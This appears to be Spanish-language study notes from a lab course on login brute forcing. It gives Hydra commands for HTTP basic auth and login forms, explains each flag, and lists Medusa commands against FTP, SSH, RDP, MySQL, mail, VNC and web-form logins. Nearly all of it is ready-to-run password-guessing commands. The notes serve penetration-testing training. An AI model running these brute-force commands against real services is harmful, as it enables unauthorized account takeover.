Skip to content

Login Brute Forcing

Exploiting Basic Auth with Hydra

c
$ hydra -l user -P passwords.txt 127.0.0.1 http-get / -s 81
  • hydra: El comando que ejecuta la herramienta de ataque de fuerza bruta.
  • -l user: Especifica un solo nombre de usuario user para usar en el ataque.
  • -P passwords.txt: Especifica un archivo de lista de contraseñas (passwords.txt) que Hydra utilizará para intentar iniciar sesión.
  • 127.0.0.1: La dirección IP del servidor de destino, que en este caso es localhost.
  • http-get: El protocolo que se va a utilizar es una solicitud HTTP GET.
  • /: El camino o recurso de la URL que se va a atacar (la raíz del servidor web).
  • -s 81: Especifica que el puerto a atacar es el 81, en lugar del predeterminado 80.
c
❯ hydra -l basic-auth-user -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt 94.237.62.166 -s 53856 http-get /
c
hydra -l admin -P /path/to/password_list.txt 127.0.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
  • hydra: La herramienta de fuerza bruta que estás utilizando.
  • -l admin: Indica que el nombre de usuario que se probará es admin.
  • -P /path/to/password_list.txt: Especifica la ruta del archivo de lista de contraseñas que Hydra usará para intentar acceder. dis- 127.0.0.1: La dirección IP del servidor de destino, en este caso localhost.
  • http-post-form: Especifica que el método HTTP a usar es POST, ya que se está atacando un formulario de inicio de sesión.
  • /login.php:user=^USER^&pass=^PASS^:F=incorrect:
    • /login.php: La ruta en el servidor donde se encuentra el formulario de inicio de sesión.
    • user=^USER^&pass=^PASS^: La cadena de datos que se envía al formulario. ^USER^ y ^PASS^ son marcadores de posición que Hydra reemplaza automáticamente con los nombres de usuario y contraseñas del archivo de lista.
    • :F=incorrect: Es la cadena que Hydra busca en la respuesta del servidor para determinar si la autenticación falló. Si la respuesta contiene incorrect, Hydra asume que la autenticación fue fallida.
c
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f IP -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"

Medusa

c
medusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt
c
medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
c
medusa -M imap -h mail.example.com -U users.txt -P passwords.txt
c
medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
c
medusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt
c
medusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt
c
medusa -M svn -h 192.168.1.100 -u admin -P passwords.txt
c
medusa -M ssh -h 192.168.1.100 -u root -P passwords.txt
c
medusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt
c
medusa -M vnc -h 192.168.1.100 -P passwords.txt
c
medusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"